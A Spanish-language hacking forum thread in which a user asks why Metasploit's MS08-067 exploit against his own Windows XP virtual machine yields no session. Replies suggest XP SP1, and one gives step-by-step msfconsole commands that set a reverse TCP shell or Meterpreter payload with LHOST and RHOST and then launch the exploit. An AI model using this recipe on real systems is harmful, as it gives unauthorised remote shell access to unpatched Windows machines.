ENTRAR EN EL FOROHACK ANTIGUO (Muchos temas viejos y de menor nivel)
14:05:02 02/12/2020
¿No estas registrado?
Login: Clave:
4 Usuarios en línea: 0 registrados, 4 invitados.
Conéctate y verás los usuarios en línea
Tema: problema al intentar penetrar windows con metasploit framework 3.3
    Responder
Todos Los Foros -> Bugs & Exploits -> problema al intentar penetrar windows con metasploit framework 3.3
Autor Mensaje (Ver Versión para Imprimir)
krnlpnchckr
Usuario muy espontáneo
Sin Imagen

Mensajes: 1
Registrad@:
20/01/2010
Estado: Desconectad@
Ver último Post
problema al intentar penetrar windows con metasploit framework 3.3

hola a todos,
he estado experimentando con metasploit framework 3.3 en ubuntu para penetrar a un
sistema windows xp que esta corriendo en una maquina virtual sobre mi ubuntu.

estoy utilizando el exploit windows/smb/ms08_067_netapi
y el payload windows/meterpreter/reverse_tcp
esto es lo que pasa al comenzar el proceso
msf exploit(ms08_067_netapi) > exploit
[*> Started reverse handler on port 4444
[*> Automatically detecting the target...
[*> Fingerprint: Windows XP Service Pack 3 - lang:Spanish
[*> Selected Target: Windows XP SP3 Spanish (NX)
[*> Triggering the vulnerability...
[*> Exploit completed, but no session was created.


como puedo solucionarlo?
gracias de antemano.
22/01/2010 21:22:18 
roller0
Maestro Nivel 4
Arreglando las imágenes

Mensajes: 733
Registrad@:
29/06/2007
Estado: Desconectad@
Ir Arriba
RE: problema al intentar penetrar windows con metasploit framework 3.3

funciona mejor con windows xp sp 1



Un gran paso para la comunidad......., un pekeño paso para el verdadero hacker.......... obtener una shell remota :D
22/01/2010 21:34:28 
garosk8ter
Usuario novato
Sin Imagen

Mensajes: 3
Registrad@:
25/01/2012
Estado: Desconectad@
Ir Arriba
RE: problema al intentar penetrar windows con metasploit framework 3.3

no se yo lo hago con windows xp sp3
primero inicio msfconsole
cuando cargue
search netapi

copiar el windows/smb/ms08_067_netapi

>use windows/smb/ms08_067_netapi

>show payloads
y podes usar

windows/meterpreter/reverse_tcp
o mas facil
windows/shell/reverse_tcp

despues
>set payload windows/shell/reverse_tcp

y configuramos ip

>set LHOST 0.0.0.1 ip de la maquina tuya con ifconfig lo ves
>set RHOST 0.0.0.2 ip del atacado

luego
>exploit
o
>run
25/01/2012 05:03:31 


REGÍSTRATE PARA PODER ENVIAR UN MENSAJE (tardas 20 segundos)

Copyright ForoHack.com